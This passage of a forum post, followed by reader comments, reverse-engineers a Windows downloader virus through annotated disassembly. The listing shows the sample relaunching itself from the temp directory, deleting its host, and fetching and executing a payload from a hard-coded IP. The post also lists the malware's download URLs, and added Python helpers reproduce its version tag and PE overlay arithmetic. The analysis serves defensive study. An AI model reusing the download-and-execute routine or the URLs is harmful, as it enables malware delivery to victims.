00402517 .59 pop ecx
00402518 .03C8 add ecx, eax
0040251A .8BF1 mov esi, ecx
0040251C .8B45 BC mov eax, dword ptr [ebp-44]
0040251F .8945 E4 mov dword ptr [ebp-1C], eax
00402522 .6A 00 push 0
00402524 .8D4D E0 lea ecx, dword ptr [ebp-20]
00402527 .51 push ecx
00402528 .FF75 E8 push dword ptr [ebp-18]
0040252B .50 push eax
0040252C .FF75 EC push dword ptr [ebp-14]
0040252F .FF55 4C call dword ptr [ebp+4C] ; ReadFile (reads the file into the base address returned by VirtualAlloc)
00402532 .FF75 F0 push dword ptr [ebp-10]
00402535 .FF75 F4 push dword ptr [ebp-C]
00402538 .FF55 64 call dword ptr [ebp+64] ; lstrcmpW
0040253B .85C0 test eax, eax
0040253D .0F84 7C010000 je 004026BF ; check whether we are running from the temp path
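The version string written at 0x00402465-0x004024B1 is worth pinning down, because it is the kind of fixed victim fingerprint a network signature can key on. The Python below is an added example (not the sample's code) that reproduces that block from my reading of the listing against the OSVERSIONINFOEXW layout: the three `lods dword` reads take the size, major and minor version; `add esi, 10E` from offset 12 lands on wProductType (+0x11A), which is compared with VER_NT_WORKSTATION (1); `sub esi, 7` after the byte load lands on wServicePackMajor (+0x114). The struct is constructed inline and the function names are mine.

```python
"""Rebuild the "/<major><minor>[SER][-SP<n>]/" tag from an OSVERSIONINFOEXW
(added example, not code from the original post). Offsets follow the
listing: lods x3 -> +0x0C; add esi,10E -> +0x11A (wProductType);
lods byte; sub esi,7 -> +0x114 (wServicePackMajor)."""
import struct

VER_NT_WORKSTATION = 1      # the value "cmp al, 1" tests at 0x0040247D
OSVI_SIZE = 0x11C           # "mov ecx, 11C" stored as dwOSVersionInfoSize


def pack_osversioninfoexw(major, minor, sp_major, product_type):
    """Constructed OSVERSIONINFOEXW as GetVersionExW would fill it."""
    head = struct.pack("<IIIII", OSVI_SIZE, major, minor, 0, 2)  # size, major, minor, build, platform
    csd = b"\x00" * 256                                          # szCSDVersion[128] (WCHAR)
    tail = struct.pack("<HHHBB", sp_major, 0, 0, product_type, 0)  # SPMajor, SPMinor, SuiteMask, ProductType, Reserved
    buf = head + csd + tail
    assert len(buf) == OSVI_SIZE
    return buf


def _digit(value):
    # mirrors "add al, 30" followed by "stos word": an 8-bit add with no carry into ah
    return chr((value & 0xFF00) | ((value + 0x30) & 0xFF))


def build_version_tag(osvi):
    """Return the tag the sample writes, e.g. '/51-SP3/' for XP SP3 workstation."""
    if len(osvi) != OSVI_SIZE:
        raise ValueError("expected a %d-byte OSVERSIONINFOEXW" % OSVI_SIZE)
    _size, major, minor = struct.unpack_from("<III", osvi, 0)   # three "lods dword"
    product_type = osvi[0x11A]                                  # "add esi, 10E" + "lods byte"
    sp_major = struct.unpack_from("<H", osvi, 0x114)[0]         # "sub esi, 7" + "lods word"
    tag = "/" + _digit(major) + _digit(minor)                   # 0x2F, then two version digits
    if product_type != VER_NT_WORKSTATION:
        tag += "SER"                                            # 0x53 0x45 0x52
    if sp_major != 0:
        tag += "-SP" + _digit(sp_major)                         # 0x2D 0x53 0x50 + digit
    return tag + "/"                                            # closing 0x2F, then NUL


def tag_for(major, minor, sp_major=0, product_type=VER_NT_WORKSTATION):
    """Convenience wrapper: tag_for(5, 1, 3) -> '/51-SP3/'."""
    return build_version_tag(pack_osversioninfoexw(major, minor, sp_major, product_type))
```

The digits are single characters because the listing adds 0x30 to the raw version number and stores one UTF-16 code unit; a major version of 10 would therefore come out as ':' rather than "10", which is exactly what the sample would have produced.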
If the current directory is not the temporary directory, the file is written into the temporary directory, the copy is executed, and the current process exits.
0040257B .57 push edi
0040257C .8D4D E0 lea ecx, dword ptr [ebp-20]
0040257F .51 push ecx
00402580 .56 push esi
00402581 .FF75 E4 push dword ptr [ebp-1C]
00402584 .50 push eax
00402585 .FF55 48 call dword ptr [ebp+48] ; WriteFile
00402588 .FF75 EC push dword ptr [ebp-14]
0040258B .FF55 38 call dword ptr [ebp+38] ; CloseHandle
0040258E .FF75 DC push dword ptr [ebp-24]
00402591 .FF55 38 call dword ptr [ebp+38] ; CloseHandle
00402594 .FF75 F4 push dword ptr [ebp-C]
00402597 .68 00080000 push 800
0040259C .FF55 54 call dword ptr [ebp+54] ; GetTempPathW
0040259F .57 push edi
004025A0 .FF75 F4 push dword ptr [ebp-C]
004025A3 .57 push edi
004025A4 .FF75 F0 push dword ptr [ebp-10]
004025A7 .B9 02000000 mov ecx, 2
004025AC .FF55 08 call dword ptr [ebp+8] ; fetch the string "open"
004025AF .50 push eax
004025B0 .57 push edi
004025B1 .FF55 0C call dword ptr [ebp+C] ; ShellExecuteW tzquw.exe
004025B4 .57 push edi
004025B5 .FF55 28 call dword ptr [ebp+28] ; ExitProcess
If the current directory is the temporary directory, it retrieves the host's path name and does not proceed with the damaging part until the host has been deleted.
004026BF > \8B55 E4 mov edx, dword ptr [ebp-1C] ; edx = BaseAddr
004026C2 .0FB742 3C movzx eax, word ptr [edx+3C] ; e_lfanew: offset of the PE header
004026C6 .03D0 add edx, eax ; edx -> PE header
004026C8 .0FB74A 06 movzx ecx, word ptr [edx+6] ; ecx = number of sections
004026CC .83C2 14 add edx, 14
004026CF .0FB702 movzx eax, word ptr [edx] ; eax = SizeOfOptionalHeader
004026D2 .40 inc eax
004026D3 .40 inc eax
004026D4 .40 inc eax
004026D5 .40 inc eax
004026D6 .03D0 add edx, eax ; edx -> section table
004026D8 .B8 28000000 mov eax, 28
004026DD .49 dec ecx
004026DE >03D0 add edx, eax
004026E0 .49 dec ecx
004026E1 .^ 75 FB jnz short 004026DE ; walk to the last section (the resource section)
004026E3 .8B42 08 mov eax, dword ptr [edx+8] ; VirtualSize
004026E6 .C1E8 09 shr eax, 9
004026E9 .40 inc eax
004026EA .C1E0 09 shl eax, 9
004026ED .0342 14 add eax, dword ptr [edx+14] ; + PointerToRawData = file offset of the appended data
004026F0 .8B7D E4 mov edi, dword ptr [ebp-1C]
004026F3 .03F8 add edi, eax
004026F5 .FF75 EC push dword ptr [ebp-14]
004026F8 .FF55 38 call dword ptr [ebp+38] ; CloseHandle
004026FB .BE 2C010000 mov esi, 12C
00402700 >57 push edi
00402701 .FF55 44 call dword ptr [ebp+44] ; DeleteFileW: delete the host
00402704 .85C0 test eax, eax
00402706 .75 0D jnz short 00402715
00402708 .6A 01 push 1
0040270A .68 E8030000 push 3E8
0040270F .FF55 2C call dword ptr [ebp+2C] ; SleepEx, retried until the delete succeeds
00402712 .4E dec esi
00402713 .^ 75 EB jnz short 00402700
00402715 >33F6 xor esi, esi
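The section-table walk above computes where the data appended after the last (resource) section begins, which is where the dropped copy keeps the host's path name that DeleteFileW is then called on. The following Python is an added example (not the sample's code) that reproduces that arithmetic on a minimal PE image constructed inline, so an analyst can carve the appended data from a dropped copy. Two caveats visible in the listing are handled: `((VirtualSize >> 9) + 1) << 9` always rounds up to the next 512-byte boundary, so a section whose VirtualSize is already a multiple of 0x200 is skipped by an extra 0x200 compared with the conventional PointerToRawData + SizeOfRawData end (both are reported for comparison); and the `dec ecx / add / dec ecx / jnz` loop walks off the table for a single-section file, which the example handles with plain arithmetic instead. Function names are mine.

```python
"""Locate and carve the data appended after the last PE section, following
the arithmetic at 0x004026BF-0x004026ED (added example, not the sample's code).
The PE image used here is constructed inline."""
import struct

OVERLAY = b"<constructed: the dropped copy stores the host path here>"


def build_sample_pe(rsrc_vsize=0x345, overlay=OVERLAY):
    """Constructed minimal PE: DOS header, PE header, two sections, appended data."""
    e_lfanew = 0x80
    img = bytearray(b"MZ" + b"\x00" * (e_lfanew - 2))
    struct.pack_into("<I", img, 0x3C, e_lfanew)
    opt_size = 0xE0
    # IMAGE_FILE_HEADER: Machine, NumberOfSections, TimeDateStamp,
    # PointerToSymbolTable, NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    img += b"PE\x00\x00" + struct.pack("<HHIIIHH", 0x14C, 2, 0, 0, 0, opt_size, 0x102)
    img += b"\x00" * opt_size                       # optional header body (unused here)

    def section(name, vsize, vaddr, rawsize, rawptr):
        # IMAGE_SECTION_HEADER (0x28 bytes): Name[8], VirtualSize, VirtualAddress,
        # SizeOfRawData, PointerToRawData, then 16 bytes left zero
        return (name.ljust(8, b"\x00")
                + struct.pack("<IIII", vsize, vaddr, rawsize, rawptr)
                + b"\x00" * 16)

    img += section(b".text", 0x1000, 0x1000, 0x1000, 0x400)
    img += section(b".rsrc", rsrc_vsize, 0x2000, 0x400, 0x1400)
    img += b"\x00" * (0x1800 - len(img))            # pad to the end of .rsrc raw data
    img += overlay
    return bytes(img)


def _last_section(img):
    """Offset of the last section header, as the listing walks to it."""
    pe = struct.unpack_from("<H", img, 0x3C)[0]        # movzx eax, word ptr [edx+3C]
    nsec = struct.unpack_from("<H", img, pe + 6)[0]     # movzx ecx, word ptr [edx+6]
    opt = struct.unpack_from("<H", img, pe + 0x14)[0]   # movzx eax, word ptr [edx] after add edx,14
    table = pe + 0x14 + opt + 4                         # four "inc eax" then add edx, eax
    if nsec < 1:
        raise ValueError("no sections")                 # the listing's loop would never stop here
    return table + 0x28 * (nsec - 1)                    # "add edx, 28" repeated nsec-1 times


def overlay_offset(img):
    """Offset the sample computes: PointerToRawData + (((VirtualSize >> 9) + 1) << 9)."""
    sec = _last_section(img)
    vsize = struct.unpack_from("<I", img, sec + 8)[0]       # mov eax, [edx+8]
    rawptr = struct.unpack_from("<I", img, sec + 0x14)[0]   # add eax, [edx+14]
    return rawptr + (((vsize >> 9) + 1) << 9)


def raw_data_end(img):
    """Conventional overlay start: PointerToRawData + SizeOfRawData of the last section."""
    sec = _last_section(img)
    rawsize, rawptr = struct.unpack_from("<II", img, sec + 0x10)
    return rawptr + rawsize


def carve_overlay(img):
    """Return the bytes the sample treats as the appended data."""
    return img[overlay_offset(img):]
```

On the constructed image both computations agree (0x1800) and `carve_overlay` returns the appended bytes; with `rsrc_vsize=0x400` the sample's rounding yields 0x1A00 while the conventional end stays 0x1800, which is the discrepancy to keep in mind when reproducing its behaviour on a real dropped file.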
The wininet APIs are then used to download a file, which is executed afterwards.
00402715 >33F6 xor esi, esi
00402717 . |56 push esi
00402718 . |56 push esi
00402719 . |56 push esi
0040271A . |6A 00 push 0
0040271C . |B9 06000000 mov ecx, 6
00402721 . |FF55 08 call dword ptr [ebp+8] ; fetch the string "Opera" (user agent)
00402724 . |50 push eax
00402725 . |FF55 24 call dword ptr [ebp+24] ; InternetOpenW
00402728 . |85C0 test eax, eax
0040272A .^\74 E9 je short 00402715
0040272C .8945 D8 mov dword ptr [ebp-28], eax
0040272F .8B7D D0 mov edi, dword ptr [ebp-30]
00402732 .B9 03000000 mov ecx, 3
00402737 .FF55 08 call dword ptr [ebp+8] ; "text/*"
0040273A .AB stos dword ptr es:[edi]
0040273B .B9 04000000 mov ecx, 4
00402740 .FF55 08 call dword ptr [ebp+8] ; "application/*"
00402743 .AB stos dword ptr es:[edi]
00402744 .33C9 xor ecx, ecx
00402746 .51 push ecx
00402747 .51 push ecx
00402748 .6A 03 push 3
0040274A .51 push ecx
0040274B .51 push ecx
0040274C .8B45 AC mov eax, dword ptr [ebp-54]
0040274F .50 push eax ; port = var_54 = 0x50 (80)
00402750 .B1 08 mov cl, 8
00402752 .FF55 08 call dword ptr [ebp+8] ; "94.23.247.202"
00402755 .50 push eax
00402756 .FF75 D8 push dword ptr [ebp-28]
00402759 .FF55 20 call dword ptr [ebp+20] ; InternetConnectW
0040275C .8945 8C mov dword ptr [ebp-74], eax
0040275F .33C0 xor eax, eax
00402761 .AB stos dword ptr es:[edi]
00402762 .8945 CC mov dword ptr [ebp-34], eax
00402765 .8945 C8 mov dword ptr [ebp-38], eax
00402768 .8945 A8 mov dword ptr [ebp-58], eax
0040276B .FF55 00 call dword ptr [ebp]
0040276E .33C0 xor eax, eax
00402770 .8BD0 mov edx, eax
00402772 >8B45 A8 mov eax, dword ptr [ebp-58]
00402775 .FF55 04 call dword ptr [ebp+4]
00402778 .85D2 test edx, edx
0040277A .74 04 je short 00402780
0040277C .38D0 cmp al, dl
0040277E .74 0C je short 0040278C
00402780 >8AD0 mov dl, al
00402782 .B8 01000000 mov eax, 1
00402787 .52 push edx
00402788 .FF55 00 call dword ptr [ebp] ; send the download request
...
00402878 > /51 push ecx
00402879 . |56 push esi
0040287A . |FF75 C0 push dword ptr [ebp-40]
0040287D . |57 push edi
0040287E . |FF75 C8 push dword ptr [ebp-38]
00402881 . |FF55 10 call dword ptr [ebp+10] ; wininet.InternetReadFile
...
004028D1 .8945 C0 mov dword ptr [ebp-40], eax
004028D4 .8945 E0 mov dword ptr [ebp-20], eax
004028D7 .8B45 BC mov eax, dword ptr [ebp-44]
004028DA .8B00 mov eax, dword ptr [eax]
004028DC .66:3D 4D5A cmp ax, 5A4D ; check the DOS header ("MZ") of the downloaded program
004028E0 .0F84 8E000000 je 00402974
...
00402976 .50 push eax
00402977 .68 80000000 push 80
0040297C .6A 02 push 2
0040297E .50 push eax
0040297F .6A 02 push 2
00402981 .68 00000040 push 40000000
00402986 .8B45 A8 mov eax, dword ptr [ebp-58]
00402989 .B4 04 mov ah, 4
0040298B .FF55 04 call dword ptr [ebp+4]
0040298E .8ACC mov cl, ah
00402990 .FF55 08 call dword ptr [ebp+8]
00402993 .50 push eax
00402994 .FF55 50 call dword ptr [ebp+50] ; CreateFileW
00402997 .8BF8 mov edi, eax
00402999 .33C0 xor eax, eax
0040299B .50 push eax
0040299C .8D45 C4 lea eax, dword ptr [ebp-3C]
0040299F .50 push eax
004029A0 .FF75 E0 push dword ptr [ebp-20]
004029A3 .FF75 9C push dword ptr [ebp-64]
004029A6 .57 push edi
004029A7 .FF55 48 call dword ptr [ebp+48] ; WriteFile
004029AA .57 push edi
004029AB .FF55 38 call dword ptr [ebp+38] ; CloseHandle
004029AE .8B75 F4 mov esi, dword ptr [ebp-C]
004029B1 .56 push esi
004029B2 .51 push ecx
004029B3 .FF55 40 call dword ptr [ebp+40] ; GetCurrentDirectoryW
004029B6 .8B45 A8 mov eax, dword ptr [ebp-58]
004029B9 .B4 04 mov ah, 4
004029BB .FF55 04 call dword ptr [ebp+4]
004029BE .8ACC mov cl, ah
004029C0 .FF55 08 call dword ptr [ebp+8]
004029C3 .50 push eax
004029C4 .56 push esi
004029C5 .B9 01000000 mov ecx, 1
004029CA .FF55 08 call dword ptr [ebp+8] ; "%s\%s"
004029CD .50 push eax
004029CE .56 push esi
004029CF .FF55 6C call dword ptr [ebp+6C] ; swprintf
004029D2 .83C4 18 add esp, 18
004029D5 .33FF xor edi, edi
004029D7 .57 push edi
004029D8 .57 push edi
004029D9 .57 push edi
004029DA .56 push esi
004029DB .B9 02000000 mov ecx, 2
004029E0 .FF55 08 call dword ptr [ebp+8] ; "open"
004029E3 .50 push eax
004029E4 .57 push edi
004029E5 .FF55 0C call dword ptr [ebp+C] ; shell32.ShellExecuteW
URLs captured from the network traffic:
http://etaxiuae.com/uploads/h76id30.zip
http://porfintengoweb.com/css/11s1.zip
http://jc-charge-it.nl/pages/11s1.zip
http://etaxiuae.com/uploads/h76id30.zip
http://porfintengoweb.com/css/11s1.zip
http://jc-charge-it.nl/pages/11s1.zip
http://etaxiuae.com/uploads/h76id30.zip
http://porfintengoweb.com/css/11s1.zip
http://jc-charge-it.nl/pages/11s1.zip
http://etaxiuae.com/uploads/h76id30.zip
http://porfintengoweb.com/css/11s1.zip
http://jc-charge-it.nl/pages/11s1.zip
http://etaxiuae.com/uploads/h76id30.zip
http://porfintengoweb.com/css/11s1.zip
http://jc-charge-it.nl/pages/11s1.zip
http://etaxiuae.com/uploads/h76id30.zip
http://porfintengoweb.com/css/11s1.zip
http://jc-charge-it.nl/pages/11s1.zip
http://etaxiuae.com/uploads/h76id30.zip
http://porfintengoweb.com/css/11s1.zip
http://jc-charge-it.nl/pages/11s1.zip
http://etaxiuae.com/uploads/h76id30.zip
However, these addresses all seem to be dead now; nothing could be downloaded.
Overall, this virus is fairly simple.
Hmily posted on 2014-8-25 17:53
Why does your formatting look so awful...
I'm fixing the formatting...
Although I couldn't understand it, I somehow read it all the way through.
Too deep, I didn't get it.
Awesome; I bow to the OP, even though I don't understand it.
Seeing an expert here, respect.
Thanks.
Thanks for sharing your experience.
I'm here to learn.
Respect to the OP, leaving my name in the front row.